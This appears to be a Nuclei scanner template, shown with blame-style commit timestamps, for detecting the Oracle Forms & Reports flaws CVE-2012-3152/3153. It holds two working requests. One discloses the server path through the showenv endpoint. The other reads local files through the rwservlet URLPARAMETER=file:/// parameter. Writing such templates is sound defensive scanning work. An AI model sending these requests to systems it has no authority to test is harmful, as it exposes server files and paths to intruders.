2021-06-22 13:52:51 +00:00
|
|
|
id: CVE-2012-3153
|
2021-06-21 08:48:42 +00:00
|
|
|
|
|
|
|
info:
|
2021-06-22 13:52:51 +00:00
|
|
|
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
|
2021-06-21 08:48:42 +00:00
|
|
|
author: Sid Ahmed MALAOUI @ Realistic Security
|
2023-07-11 19:49:27 +00:00
|
|
|
severity: medium
|
2021-06-21 08:48:42 +00:00
|
|
|
description: |
|
2022-02-21 22:45:04 +00:00
|
|
|
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
|
2021-06-22 13:52:51 +00:00
|
|
|
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
|
2021-06-21 08:48:42 +00:00
|
|
|
vectors related to Report Server Component.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
|
2021-06-21 08:48:42 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
|
|
|
|
- https://www.exploit-db.com/exploits/31737
|
2022-02-21 22:45:04 +00:00
|
|
|
- https://www.oracle.com/security-alerts/cpuoct2012.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
|
2022-02-21 22:45:04 +00:00
|
|
|
classification:
|
2022-09-06 01:33:31 +00:00
|
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
|
2023-04-18 02:40:53 +00:00
|
|
|
cvss-score: 6.4
|
2022-02-21 22:45:04 +00:00
|
|
|
cve-id: CVE-2012-3153
|
2022-09-06 01:33:31 +00:00
|
|
|
cwe-id: NVD-CWE-noinfo
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-score: 0.95986
|
2024-01-29 17:11:14 +00:00
|
|
|
epss-percentile: 0.99354
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: oracle
|
|
|
|
product: fusion_middleware
|
|
|
|
tags: cve,cve2012,oracle,rce,edb
|
2021-06-21 08:48:42 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-06-21 08:48:42 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-06-22 13:52:51 +00:00
|
|
|
- "{{BaseURL}}/reports/rwservlet/showenv"
|
2021-06-21 08:48:42 +00:00
|
|
|
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
|
2021-06-23 18:18:34 +00:00
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
matchers-condition: and
|
2021-06-21 08:48:42 +00:00
|
|
|
matchers:
|
2021-06-22 13:52:51 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2021-07-03 19:35:05 +00:00
|
|
|
- 'contains(body_1, "Reports Servlet")'
|
2021-06-23 18:18:34 +00:00
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2021-06-29 07:11:19 +00:00
|
|
|
- '!contains(body_2, "<html")'
|
|
|
|
- '!contains(body_2, "<HTML")'
|
2021-06-23 18:18:34 +00:00
|
|
|
condition: and
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: windows_working_path
|
|
|
|
regex:
|
|
|
|
- ".?.?\\\\.*\\\\showenv"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
- type: regex
|
|
|
|
name: linux_working_path
|
|
|
|
regex:
|
|
|
|
- "/.*/showenv"
|
2024-01-30 06:46:18 +00:00
|
|
|
# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950
|